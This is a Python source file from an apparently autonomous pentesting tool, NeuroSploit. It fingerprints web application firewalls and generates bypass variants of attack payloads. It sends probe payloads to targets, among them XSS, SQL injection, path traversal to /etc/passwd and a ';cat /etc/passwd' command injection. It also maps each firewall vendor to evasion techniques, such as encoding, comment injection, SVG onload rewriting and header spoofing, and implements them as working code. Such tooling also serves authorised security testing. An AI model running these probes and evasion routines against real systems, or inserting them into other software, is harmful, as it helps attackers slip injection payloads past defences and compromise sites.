Files
NeuroSploit/backend/core/waf_detector.py
2026-02-11 10:47:33 -03:00

534 lines
18 KiB
Python

"""
NeuroSploit v3 - WAF Detector
WAF fingerprinting, bypass strategy database, and payload adaptation
for autonomous pentesting. Detects 15+ WAF vendors and provides
per-WAF bypass techniques.
"""
import logging
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any
logger = logging.getLogger(__name__)
@dataclass
class WAFMatch:
"""A detected WAF."""
name: str # "cloudflare", "aws_waf", etc.
confidence: float # 0.0-1.0
detection_method: str # "header", "body", "server", "probe"
evidence: str
@dataclass
class WAFResult:
"""Complete WAF detection result."""
detected_wafs: List[WAFMatch] = field(default_factory=list)
blocking_patterns: Dict[str, bool] = field(default_factory=dict)
recommended_delay: float = 0.1
# 15+ WAF signatures
WAF_SIGNATURES = {
"cloudflare": {
"headers": ["cf-ray", "cf-request-id", "cf-cache-status"],
"body": ["cloudflare", "ray id:", "error 1020", "error 1015"],
"server": ["cloudflare"],
},
"aws_waf": {
"headers": ["x-amzn-requestid", "x-amzn-errortype"],
"body": ["request blocked", "aws waf"],
"server": ["cloudfront", "amazons3"],
},
"akamai": {
"headers": ["x-akamai-session-info", "akamai-origin-hop"],
"body": ["akamai", "ghost"],
"server": ["akamaighost"],
},
"imperva": {
"headers": ["x-iinfo", "x-cdn"],
"body": ["imperva", "incapsula incident", "incapsula"],
"server": ["imperva"],
},
"modsecurity": {
"headers": ["x-denied-reason", "x-modsecurity"],
"body": ["mod_security", "modsecurity", "noyb"],
"server": [],
},
"f5_bigip": {
"headers": ["x-waf-status", "x-cnection"],
"body": ["the requested url was rejected"],
"server": ["big-ip", "bigip", "f5"],
},
"sucuri": {
"headers": ["x-sucuri-id", "x-sucuri-cache"],
"body": ["sucuri", "sucuri website firewall", "cloudproxy"],
"server": ["sucuri"],
},
"barracuda": {
"headers": ["barra_counter_session"],
"body": ["barracuda", "barracuda networks"],
"server": [],
},
"fortinet": {
"headers": ["x-fw-server"],
"body": ["fortigate", "fortiweb", "fortinet"],
"server": ["fortiweb"],
},
"citrix": {
"headers": ["citrix-transactionid", "cneonction", "nncoection"],
"body": ["citrix", "netscaler appfw"],
"server": ["netscaler"],
},
"azure_waf": {
"headers": ["x-azure-ref", "x-ms-forbidden-ip"],
"body": ["azure application gateway", "azure front door"],
"server": ["microsoft-azure-application-gateway"],
},
"gcp_armor": {
"headers": ["x-cloud-trace-context"],
"body": ["google cloud armor", "forbidden by security policy"],
"server": ["google frontend", "gfe"],
},
"wordfence": {
"headers": [],
"body": ["wordfence", "generated by wordfence", "this response was generated by wordfence"],
"server": [],
},
"cloudfront": {
"headers": ["x-amz-cf-id", "x-amz-cf-pop"],
"body": ["cloudfront", "error from cloudfront"],
"server": ["cloudfront"],
},
"fastly": {
"headers": ["x-fastly-request-id", "fastly-restarts"],
"body": ["fastly error"],
"server": ["fastly"],
},
"reblaze": {
"headers": ["rbzid"],
"body": ["reblaze", "access denied (rbz)"],
"server": ["reblaze"],
},
}
# Bypass strategies per WAF
BYPASS_STRATEGIES = {
"cloudflare": {
"xss": [
"unicode_escape", # \u003cscript\u003e
"svg_payload", # <svg onload=...>
"comment_injection", # <scr<!---->ipt>
"case_mixing", # <ScRiPt>
"html_entity", # &#x3c;script&#x3e;
],
"sqli": [
"inline_comment", # /*!50000UNION*/
"case_mixing", # uNiOn SeLeCt
"whitespace_variant", # UNION%0bSELECT
"scientific_notation", # 1e0UNION
],
"general": {
"delay": 0.3,
"headers": {"X-Forwarded-For": "127.0.0.1"},
},
},
"modsecurity": {
"xss": [
"inline_comment",
"case_mixing",
"whitespace_variant",
"null_byte",
],
"sqli": [
"inline_comment", # /*!50000OR*/
"case_mixing",
"double_encoding", # %2527
"whitespace_variant", # tab, newline, %0a
],
"general": {
"delay": 0.2,
},
},
"aws_waf": {
"xss": [
"double_encoding",
"null_byte",
"unicode_escape",
"svg_payload",
],
"sqli": [
"double_encoding", # %253C = <
"null_byte", # \x00
"scientific_notation", # 1e0=1
"concat_function", # CONCAT(0x27,...)
],
"general": {
"delay": 0.2,
},
},
"imperva": {
"xss": [
"unicode_escape",
"html_entity",
"svg_payload",
"comment_injection",
],
"sqli": [
"inline_comment",
"hex_encoding",
"whitespace_variant",
],
"general": {
"delay": 0.5,
},
},
"generic": {
"xss": [
"case_mixing",
"unicode_escape",
"svg_payload",
"html_entity",
],
"sqli": [
"inline_comment",
"case_mixing",
"whitespace_variant",
],
"general": {
"delay": 0.3,
"headers": {"X-Forwarded-For": "127.0.0.1"},
},
},
}
class WAFDetector:
"""WAF fingerprinting and bypass strategy engine.
Usage:
detector = WAFDetector(request_engine)
result = await detector.detect(url)
if result.detected_wafs:
adapted = detector.adapt_payload(payload, waf_name, vuln_type)
"""
# Probe payloads that trigger WAF responses
PROBE_PAYLOADS = {
"xss": "<script>alert(1)</script>",
"sqli": "' OR 1=1--",
"lfi": "../../etc/passwd",
"rce": ";cat /etc/passwd",
}
def __init__(self, request_engine=None):
self.request_engine = request_engine
self._cache: Dict[str, WAFResult] = {} # url -> result
async def detect(self, url: str) -> WAFResult:
"""Detect WAFs on the target URL.
Phase 1: Passive detection (headers/body from normal response)
Phase 2: Active probing (send trigger payloads, analyze blocks)
"""
from urllib.parse import urlparse
host = urlparse(url).netloc
if host in self._cache:
return self._cache[host]
detected: List[WAFMatch] = []
blocking: Dict[str, bool] = {}
# Phase 1: Passive detection from baseline request
if self.request_engine:
try:
result = await self.request_engine.request(url, method="GET")
if result:
passive_wafs = self._check_signatures(
result.headers, result.body, result.status
)
detected.extend(passive_wafs)
except Exception as e:
logger.debug(f"WAF passive detection error: {e}")
# Phase 2: Active probing (only if request engine available)
if self.request_engine:
for probe_type, payload in self.PROBE_PAYLOADS.items():
try:
probe_url = f"{url}?test={payload}"
result = await self.request_engine.request(
probe_url, method="GET"
)
if result:
if result.status in (403, 406, 429, 501):
blocking[probe_type] = True
probe_wafs = self._check_signatures(
result.headers, result.body, result.status
)
for w in probe_wafs:
if not any(d.name == w.name for d in detected):
w.detection_method = "probe"
detected.append(w)
else:
blocking[probe_type] = False
except Exception:
pass
# Determine recommended delay
delay = 0.1
if detected:
primary_waf = detected[0].name
strategy = BYPASS_STRATEGIES.get(primary_waf, BYPASS_STRATEGIES["generic"])
delay = strategy.get("general", {}).get("delay", 0.3)
waf_result = WAFResult(
detected_wafs=detected,
blocking_patterns=blocking,
recommended_delay=delay,
)
self._cache[host] = waf_result
if detected:
waf_names = ", ".join(f"{w.name}({w.confidence:.0%})" for w in detected)
logger.info(f"WAF detected on {host}: {waf_names}")
return waf_result
def _check_signatures(
self,
headers: Dict[str, str],
body: str,
status: int,
) -> List[WAFMatch]:
"""Check response against WAF signature database."""
matches = []
headers_lower = {k.lower(): v.lower() for k, v in headers.items()}
body_lower = (body or "").lower()[:5000]
server = headers_lower.get("server", "")
for waf_name, sigs in WAF_SIGNATURES.items():
evidence_parts = []
confidence = 0.0
# Check headers
for h in sigs.get("headers", []):
if h.lower() in headers_lower:
evidence_parts.append(f"header:{h}")
confidence += 0.4
# Check body
for b in sigs.get("body", []):
if b.lower() in body_lower:
evidence_parts.append(f"body:{b}")
confidence += 0.3
# Check server header
for s in sigs.get("server", []):
if s.lower() in server:
evidence_parts.append(f"server:{s}")
confidence += 0.5
if evidence_parts:
confidence = min(1.0, confidence)
matches.append(WAFMatch(
name=waf_name,
confidence=confidence,
detection_method="header" if any("header:" in e for e in evidence_parts) else "body",
evidence=", ".join(evidence_parts),
))
# Sort by confidence
matches.sort(key=lambda m: m.confidence, reverse=True)
return matches
def get_bypass_strategy(self, waf_name: str, vuln_type: str) -> Dict:
"""Get bypass strategy for a specific WAF + vuln type combination."""
strategies = BYPASS_STRATEGIES.get(waf_name, BYPASS_STRATEGIES["generic"])
# Normalize vuln type to category
category = self._vuln_to_category(vuln_type)
techniques = strategies.get(category, strategies.get("xss", []))
general = strategies.get("general", {})
return {
"techniques": techniques,
"delay": general.get("delay", 0.3),
"extra_headers": general.get("headers", {}),
}
def adapt_payload(
self, payload: str, waf_name: str, vuln_type: str
) -> List[str]:
"""Generate bypass variants of a payload for a specific WAF.
Returns list of adapted payloads, with original as fallback.
"""
strategy = self.get_bypass_strategy(waf_name, vuln_type)
adapted = []
for technique in strategy.get("techniques", []):
variant = self._apply_technique(payload, technique, vuln_type)
if variant and variant != payload:
adapted.append(variant)
# Deduplicate while preserving order
seen = set()
unique = []
for p in adapted:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:8] # Max 8 variants
def _vuln_to_category(self, vuln_type: str) -> str:
"""Map specific vuln type to WAF bypass category."""
sqli_types = {"sqli_error", "sqli_blind", "sqli_union", "sqli_time",
"sqli", "nosql_injection"}
xss_types = {"xss_reflected", "xss_stored", "xss_dom", "xss"}
if vuln_type in sqli_types:
return "sqli"
if vuln_type in xss_types:
return "xss"
return "xss" # Default category
def _apply_technique(self, payload: str, technique: str, vuln_type: str) -> Optional[str]:
"""Apply a specific bypass technique to a payload."""
try:
if technique == "unicode_escape":
return self._unicode_escape(payload)
elif technique == "case_mixing":
return self._case_mix(payload)
elif technique == "double_encoding":
return self._double_encode(payload)
elif technique == "null_byte":
return self._null_byte(payload)
elif technique == "comment_injection":
return self._comment_inject(payload)
elif technique == "inline_comment":
return self._inline_comment(payload)
elif technique == "whitespace_variant":
return self._whitespace_variant(payload)
elif technique == "svg_payload":
return self._svg_variant(payload)
elif technique == "html_entity":
return self._html_entity(payload)
elif technique == "scientific_notation":
return self._scientific_notation(payload)
elif technique == "hex_encoding":
return self._hex_encode(payload)
elif technique == "concat_function":
return self._concat_function(payload)
except Exception:
pass
return None
# --- Bypass technique implementations ---
def _unicode_escape(self, payload: str) -> str:
"""Replace key characters with unicode escapes."""
replacements = {
"<": "\\u003c", ">": "\\u003e", "'": "\\u0027",
'"': "\\u0022", "/": "\\u002f",
}
result = payload
for old, new in replacements.items():
result = result.replace(old, new)
return result
def _case_mix(self, payload: str) -> str:
"""Alternate case: <ScRiPt>, uNiOn SeLeCt."""
result = []
upper = True
for c in payload:
if c.isalpha():
result.append(c.upper() if upper else c.lower())
upper = not upper
else:
result.append(c)
return "".join(result)
def _double_encode(self, payload: str) -> str:
"""Double URL-encode special characters."""
import urllib.parse
# First encode
encoded = urllib.parse.quote(payload, safe="")
# Encode the % signs
return encoded.replace("%", "%25")
def _null_byte(self, payload: str) -> str:
"""Insert null bytes before key characters."""
return payload.replace("<", "%00<").replace("'", "%00'").replace('"', '%00"')
def _comment_inject(self, payload: str) -> str:
"""Inject HTML comments into tags."""
# <script> -> <scr<!---->ipt>
payload = payload.replace("<script>", "<scr<!---->ipt>")
payload = payload.replace("</script>", "</scr<!---->ipt>")
return payload
def _inline_comment(self, payload: str) -> str:
"""SQL inline comment bypass: UNION -> /*!50000UNION*/"""
keywords = ["UNION", "SELECT", "OR", "AND", "FROM", "WHERE"]
result = payload
for kw in keywords:
result = re.sub(
rf'\b{kw}\b',
f'/*!50000{kw}*/',
result,
flags=re.IGNORECASE
)
return result
def _whitespace_variant(self, payload: str) -> str:
"""Replace spaces with alternative whitespace."""
alternatives = ["%09", "%0a", "%0b", "%0c", "%0d", "%a0"]
result = payload
for alt in alternatives[:2]:
result = result.replace(" ", alt, 1)
return result
def _svg_variant(self, payload: str) -> str:
"""Convert XSS to SVG-based payload."""
# Extract the JS code if possible
match = re.search(r'(?:alert|confirm|prompt)\([^)]*\)', payload)
if match:
js_code = match.group(0)
return f'<svg onload="{js_code}">'
return '<svg/onload=alert(1)>'
def _html_entity(self, payload: str) -> str:
"""Encode with HTML entities."""
replacements = {
"<": "&#60;", ">": "&#62;", "'": "&#39;",
'"': "&#34;", "/": "&#47;",
}
result = payload
for old, new in replacements.items():
result = result.replace(old, new)
return result
def _scientific_notation(self, payload: str) -> str:
"""Use scientific notation for SQL: 1 OR -> 1e0OR"""
return re.sub(r'(\d+)\s+(OR|AND|UNION)', r'\1e0\2', payload, flags=re.IGNORECASE)
def _hex_encode(self, payload: str) -> str:
"""Hex-encode string literals in SQL."""
def to_hex(match):
s = match.group(1)
hex_str = "0x" + s.encode().hex()
return hex_str
return re.sub(r"'([^']+)'", to_hex, payload)
def _concat_function(self, payload: str) -> str:
"""Use CONCAT() to build strings."""
def concat_str(match):
s = match.group(1)
chars = ",".join(f"CHAR({ord(c)})" for c in s)
return f"CONCAT({chars})"
return re.sub(r"'([^']+)'", concat_str, payload)